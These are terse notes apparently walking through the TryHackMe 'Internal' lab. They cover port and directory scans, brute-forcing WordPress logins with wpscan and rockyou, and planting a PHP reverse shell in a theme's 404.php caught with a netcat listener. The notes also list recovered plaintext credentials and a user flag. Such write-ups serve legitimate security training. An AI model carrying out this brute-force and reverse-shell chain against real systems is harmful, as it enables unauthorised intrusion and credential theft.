- Enumeration nmap scan nmap -sC -sV 10.10.10.10 result: Port 22/tcp SSH Port 80/tcp Apache httpd 2.4.29 (ubuntu)
gobuster directory scan gobuster dir -u http://10.10.10.10 -w wordlist.txt result: /blog, /phpmyadmin
- explore /phpmyadmin result: login page try to brute force user and login using ‘admin’ as user use burpsuite capture login request send to intruder add payload start attack result:
explor /blog -wordpress site -use wpscan wpscan —url 10.10.10.10/blog —usernames admin —password rockyou.txt —max-threads 50 result: user: admin, pass: my2boys go to 10.10.10.10/blog/wp-admin/ login add PHP reverse sheell in Apperance > Theme Editor > 404.php http://pentestmonkey.net/tools/web-shells/php-reverse-shell open listener nc -lvnp 1234 call http://internal.thm/blog/wp-conent/themes/twentyseventeen/404.php cat wp-save.txt aubreanna:bubb13guM!@#123 cat user.txt result: THM{int3rna1_fl4g_1}
Root -cat jenkins.txt result Jenkins running on 172.17.0.2:8080 … https://www.aldeid.com/wiki/TryHackMe-Internal